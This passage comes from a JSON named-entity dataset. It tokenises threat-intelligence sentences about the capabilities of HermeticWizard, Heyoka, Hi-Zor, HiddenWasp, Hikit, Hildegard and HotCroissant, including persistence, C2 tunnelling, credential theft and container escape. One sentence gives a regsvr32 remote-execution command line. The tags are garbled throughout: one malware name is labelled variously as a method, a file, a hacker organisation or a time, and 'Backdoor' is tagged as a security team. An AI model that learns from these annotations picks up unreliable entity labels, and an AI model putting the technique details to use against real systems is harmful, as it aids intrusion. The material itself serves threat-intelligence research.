"mimic", - "a", - "legitimate", - "MS", - "Outlook", - ".dll." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "connect", - "to", - "remote", - "shares", - "using", - "`WNetAddConnection2W`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HermeticWizard", - "has", - "the", - "ability", - "to", - "scan", - "ports", - "on", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "use", - "a", - "list", - "of", - "hardcoded", - "credentials", - "in", - "attempt", - "to", - "authenticate", - "to", - "SMB", - "shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "has", - "used", - "`regsvr32.exe", - "/s", - "/i`", - "to", - "execute", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "find", - "machines", - "on", - "the", - "local", - "network", - "by", - "gathering", - "known", - "local", - "IP", - "addresses", - "through", - "`DNSGetCacheDataTable`,", - "`GetIpNetTable`,`WNetOpenEnumW(RESOURCE_GLOBALNET,", - "RESOURCETYPE_ANY)`,`NetServerEnum`,`GetTcpTable`,", - "and", - "`GetAdaptersAddresses.`" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "B-SamFile", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HermeticWizard", - "has", - "the", - "ability", - "to", - "create", - "a", - "new", - "process", - "using", - "`rundll32`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "use", - "a", - "list", - "of", - "hardcoded", - "credentials", - "to", - "to", - "authenticate", - "via", - "NTLMSSP", - "to", - "the", - "SMB", - "shares", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "use", - "`OpenRemoteServiceManager`", - "to", - "create", - "a", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "use", - "`cmd.exe`", - "for", - "execution", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "use", - "WMI", - "to", - "create", - "a", - "new", - "process", - "on", - "a", - "remote", - "machine", - "via", - "`C:\\windows\\system32\\cmd.exe", - "/c", - "start", - "C:\\windows\\system32\\\\regsvr32.exe", - "/s", - "/iC:\\windows\\<filename>.dll`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "use", - "DNS", - "tunneling", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "decrypt", - "its", - "payload", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "inject", - "a", - "DLL", - "into", - "rundll32.exe", - "for", - "execution." - ], - "ner_tags": [ - "B-HackOrg", - "B-SecTeam", - "O", - "B-Features", - "I-Features", - "B-Way", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "encrypt", - "its", - "payload." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "has", - "the", - "ability", - "to", - "delete", - "folders", - "and", - "files", - "from", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "has", - "the", - "ability", - "to", - "search", - "the", - "compromised", - "host", - "for", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "I-Purp", - "I-Purp", - "I-Purp", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "has", - "been", - "spread", - "through", - "malicious", - "document", - "lures." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "has", - "been", - "named", - "`srvdll.dll`", - "to", - "appear", - "as", - "a", - "legitimate", - "service." - ], - "ner_tags": [ - "B-HackOrg", - "B-SecTeam", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "identify", - "removable", - "media", - "attached", - "to", - "victim's", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "gather", - "process", - "information." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "use", - "spoofed", - "DNS", - "requests", - "to", - "create", - "a", - "bidirectional", - "tunnel", - "between", - "a", - "compromised", - "host", - "and", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "establish", - "persistence", - "with", - "the", - "auto", - "start", - "function", - "including", - "using", - "the", - "value", - "`EverNoteTrayUService`." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "use", - "rundll32.exe", - "to", - "gain", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "enumerate", - "drives", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heyoka", - "Backdoor", - "can", - "check", - "if", - "it", - "is", - "running", - "as", - "a", - "service", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hi-Zor", - "encrypts", - "C2", - "traffic", - "with", - "TLS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hi-Zor", - "uses", - "various", - "XOR", - "techniques", - "to", - "obfuscate", - "its", - "components." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hi-Zor", - "deletes", - "its", - "RAT", - "installer", - "file", - "as", - "it", - "executes", - "its", - "DLL", - "payload", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hi-Zor", - "has", - "the", - "ability", - "to", - "upload", - "and", - "download", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hi-Zor", - "creates", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hi-Zor", - "executes", - "using", - "regsvr32.exe", - "called", - "from", - "the", - "Registry", - "Run", - "Keys", - "/", - "Startup", - "Folder", - "persistence", - "mechanism." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hi-Zor", - "encrypts", - "C2", - "traffic", - "with", - "a", - "double", - "XOR", - "using", - "two", - "distinct", - "single-byte", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Hi-Zor", - "communicates", - "with", - "its", - "C2", - "server", - "over", - "HTTPS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Hi-Zor", - "has", - "the", - "ability", - "to", - "create", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "uses", - "a", - "cipher", - "to", - "implement", - "a", - "decoding", - "function." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "adds", - "itself", - "as", - "a", - "shared", - "object", - "to", - "the", - "LD_PRELOAD", - "environment", - "variable." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "encrypts", - "its", - "configuration", - "and", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "downloads", - "a", - "tar", - "compressed", - "archive", - "from", - "a", - "download", - "server", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "creates", - "a", - "user", - "account", - "as", - "a", - "means", - "to", - "provide", - "initial", - "persistence", - "to", - "the", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "communicates", - "with", - "a", - "simple", - "network", - "protocol", - "over", - "TCP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "HiddenWasp", - "installs", - "reboot", - "persistence", - "by", - "adding", - "itself", - "to", - "<code>/etc/rc.local</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "uses", - "a", - "rootkit", - "to", - "hook", - "and", - "implement", - "functions", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "uses", - "an", - "RC4-like", - "algorithm", - "with", - "an", - "already", - "computed", - "PRGA", - "generated", - "key-stream", - "for", - "network", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HiddenWasp", - "uses", - "a", - "script", - "to", - "automate", - "tasks", - "on", - "the", - "victim's", - "machine", - "and", - "to", - "assist", - "in", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "has", - "attempted", - "to", - "disable", - "driver", - "signing", - "verification", - "by", - "tampering", - "with", - "several", - "Registry", - "keys", - "prior", - "to", - "the", - "loading", - "of", - "a", - "rootkit", - "driver", - "component." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "has", - "used", - "DLL", - "Search", - "Order", - "Hijacking", - "to", - "load", - "<code>oci.dll</code>", - "as", - "a", - "persistence", - "mechanism." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "can", - "upload", - "files", - "from", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "has", - "the", - "ability", - "to", - "download", - "files", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "installs", - "a", - "self-generated", - "certificate", - "to", - "the", - "local", - "trust", - "store", - "as", - "a", - "root", - "CA", - "and", - "Trusted", - "Publisher." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "supports", - "peer", - "connections." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Hikit", - "has", - "been", - "spread", - "through", - "spear", - "phishing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "is", - "a", - "Rootkit", - "that", - "has", - "been", - "used", - "by", - "Axiom." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "performs", - "XOR", - "encryption." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Hikit", - "has", - "the", - "ability", - "to", - "create", - "a", - "remote", - "shell", - "and", - "run", - "given", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "used", - "an", - "IRC", - "channel", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "used", - "history", - "-c", - "to", - "clear", - "script", - "shell", - "logs." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "queried", - "the", - "Cloud", - "Instance", - "Metadata", - "API", - "for", - "cloud", - "credentials." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "was", - "executed", - "through", - "the", - "kubelet", - "API", - "run", - "command", - "and", - "by", - "executing", - "commands", - "on", - "running", - "containers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "used", - "masscan", - "to", - "search", - "for", - "kubelets", - "and", - "the", - "kubelet", - "API", - "for", - "additional", - "running", - "containers." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "searched", - "for", - "SSH", - "keys,", - "Docker", - "credentials,", - "and", - "Kubernetes", - "service", - "tokens." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Tool", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "decrypted", - "ELF", - "files", - "with", - "AES." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "modified", - "DNS", - "resolvers", - "to", - "evade", - "DNS", - "monitoring", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "modified", - "/etc/ld.so.preload", - "to", - "intercept", - "shared", - "library", - "import", - "functions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "encrypted", - "an", - "ELF", - "file." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "used", - "the", - "BOtB", - "tool", - "that", - "can", - "break", - "out", - "of", - "containers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "used", - "the", - "BOtB", - "tool", - "which", - "exploits", - "CVE-2019-5736." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Hildegard", - "was", - "executed", - "through", - "an", - "unsecure", - "kubelet", - "that", - "allowed", - "anonymous", - "access", - "to", - "the", - "victim", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "deleted", - "scripts", - "after", - "execution." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "downloaded", - "additional", - "scripts", - "that", - "build", - "and", - "run", - "Monero", - "cryptocurrency", - "miners." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "created", - "a", - "user", - "named", - "“monerodaemon”." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "disguised", - "itself", - "as", - "a", - "known", - "Linux", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "used", - "masscan", - "to", - "look", - "for", - "kubelets", - "in", - "the", - "internal", - "Kubernetes", - "network." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "searched", - "for", - "private", - "keys", - "in", - ".ssh." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "established", - "tmate", - "sessions", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "used", - "xmrig", - "to", - "mine", - "cryptocurrency." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "modified", - "/etc/ld.so.preload", - "to", - "overwrite", - "readdir()", - "and", - "readdir64()." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "packed", - "ELF", - "files", - "into", - "other", - "binaries." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "collected", - "the", - "host's", - "OS,", - "CPU,", - "and", - "memory", - "information." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "started", - "a", - "monero", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "used", - "shell", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Hildegard", - "has", - "downloaded", - "scripts", - "from", - "GitHub." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "list", - "the", - "names", - "of", - "all", - "open", - "windows", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "encrypted", - "strings", - "with", - "single-byte", - "XOR", - "and", - "base64", - "encoded", - "RC4." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "download", - "files", - "from", - "the", - "infected", - "host", - "to", - "the", - "command", - "and", - "control", - "(C2)", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "clean", - "up", - "installed", - "files,", - "delete", - "files,", - "and", - "delete", - "itself", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "retrieve", - "a", - "list", - "of", - "files", - "in", - "a", - "given", - "directory", - "as", - "well", - "as", - "drives", - "and", - "drive", - "types." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "hide", - "the", - "window", - "for", - "operations", - "performed", - "on", - "a", - "given", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "upload", - "a", - "file", - "from", - "the", - "command", - "and", - "control", - "(C2)", - "server", - "to", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "can", - "perform", - "dynamic", - "DLL", - "importing", - "and", - "API", - "lookups", - "using", - "<code>LoadLibrary</code>", - "and", - "<code>GetProcAddress</code>", - "on", - "obfuscated", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "list", - "running", - "processes", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "attempted", - "to", - "install", - "a", - "scheduled", - "task", - "named", - "“Java", - "Maintenance64”", - "on", - "startup", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "do", - "real", - "time", - "screen", - "viewing", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "stop", - "services", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "can", - "retrieve", - "a", - "list", - "of", - "applications", - "from", - "the", - "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App", - "Paths</code>", - "registry", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "used", - "the", - "open", - "source", - "UPX", - "executable", - "packer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "compressed", - "network", - "communications", - "and", - "encrypted", - "them", - "with", - "a", - "custom", - "stream", - "cipher." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "determine", - "if", - "the", - "current", - "user", - "is", - "an", - "administrator,", - "Windows", - "product", - "name,", - "processor", - "name,", - "screen", - "resolution,", - "and", - "physical", - "RAM", - "of", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "identify", - "the", - "IP", - "address", - "of", - "the", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "collect", - "the", - "username", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HotCroissant", - "has", - "the", - "ability", - "to", - "retrieve", - "a", - "list", - "of", - "services", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - 